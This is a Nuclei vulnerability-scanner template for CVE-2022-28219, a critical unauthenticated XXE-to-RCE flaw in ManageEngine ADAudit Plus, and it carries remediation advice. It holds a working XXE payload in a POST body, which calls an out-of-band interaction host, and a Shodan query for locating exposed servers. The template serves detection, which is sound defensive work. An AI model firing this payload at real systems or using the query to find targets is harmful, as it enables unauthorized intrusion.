nuclei-templates/cves/2022/CVE-2022-28219.yaml

58 lines
1.7 KiB
YAML
Raw Normal View History

2022-06-30 05:41:59 +00:00
id: CVE-2022-28219
info:
2022-06-30 09:09:11 +00:00
name: Zoho ManageEngine ADAudit Plus - Unauthenticated XXE to RCE
2022-06-30 05:41:59 +00:00
author: dwisiswant0
severity: critical
description: |
Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an
unauthenticated XXE attack that leads to Remote Code Execution.
This template supports the detection part only, to achieve an
XXE to RCE, see reference[2].
reference:
- https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
- https://www.horizon3.ai/red-team-blog-cve-2022-28219/
- https://manageengine.com
2022-06-30 05:41:59 +00:00
remediation: |
Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus
is configured with a dedicated service account with restricted privileges.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-28219
cwe-id: CWE-611
2022-06-30 09:07:30 +00:00
metadata:
shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus"
verified: "true"
2022-06-30 09:07:30 +00:00
tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth
2022-06-30 05:41:59 +00:00
requests:
- method: POST
path:
- "{{BaseURL}}/api/agent/tabs/agentData"
2022-06-30 09:07:30 +00:00
2022-06-30 05:41:59 +00:00
headers:
Content-Type: application/json
body: |
[
{
"DomainName": "{{Host}}",
"EventCode": 4688,
"EventType": 0,
"TimeGenerated": 0,
"Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><! foo [ <!ENTITY % xxe SYSTEM \"http://{{interactsh-url}}\"> %xxe; ]>"
}
]
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
2022-06-30 09:07:30 +00:00
- type: word
part: body
words:
- "ManageEngine"